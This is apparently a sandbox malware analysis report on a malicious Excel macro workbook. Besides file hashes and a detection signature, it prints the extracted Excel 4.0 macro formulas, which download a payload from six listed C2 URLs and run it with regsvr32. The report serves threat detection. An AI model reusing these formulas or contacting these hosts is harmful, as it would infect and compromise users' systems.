General

  • Target

    b352ff5f3809f1f54cfa88eb8a1ff3bd4db6ae59a323ef8db61a44a29d0508a3

  • Size

    48KB

  • MD5

    74e3985712381d3b72554d8f936e9311

  • SHA1

    464ecb116a726e607126e3112db6d4dc30e5fa55

  • SHA256

    b352ff5f3809f1f54cfa88eb8a1ff3bd4db6ae59a323ef8db61a44a29d0508a3

  • SHA512

    d9aa193dd55ff8112d40c6d5718ffc207437224b4db51f25dbcdc678e4bf8d50784cbdf4942f52390e8960e404578d21083a41341ff1674e5e80a872e3efc200

  • SSDEEP

    768:k2uCkFF/vxRhR0KDNWBA7rTj+RYV8Q0RuVBR2jPrtysHRX0BAR5:LuTlbMKDNck01u/R2rZyjB+5

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://henrysfreshroast.com/OevI7Yy0i6YShxFl/

http://www.ajaxmatters.com/c7g8t/nnzJJ1rKFD2P/

http://aopda.org/wp-content/uploads/5oTAVJyjDFOllX2uE/

https://winnieswondersaviary.com/wp-content/mxPfty43IionmElgK3h/

http://1000paginas.com/tienda/vWtT/

http://crm.techopesolutions.com/b48om9p6/vquxKuTvTj/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://henrysfreshroast.com/OevI7Yy0i6YShxFl/","..\si.ocx",0,0)
    =IF('LGGDGB'!E11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ajaxmatters.com/c7g8t/nnzJJ1rKFD2P/","..\si.ocx",0,0))
    =IF('LGGDGB'!E13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://aopda.org/wp-content/uploads/5oTAVJyjDFOllX2uE/","..\si.ocx",0,0))
    =IF('LGGDGB'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://winnieswondersaviary.com/wp-content/mxPfty43IionmElgK3h/","..\si.ocx",0,0))
    =IF('LGGDGB'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://1000paginas.com/tienda/vWtT/","..\si.ocx",0,0))
    =IF('LGGDGB'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://crm.techopesolutions.com/b48om9p6/vquxKuTvTj/","..\si.ocx",0,0))
    =IF('LGGDGB'!E21<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\si.ocx")
    =RETURN()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

Files

  • b352ff5f3809f1f54cfa88eb8a1ff3bd4db6ae59a323ef8db61a44a29d0508a3
    .xlsm office2007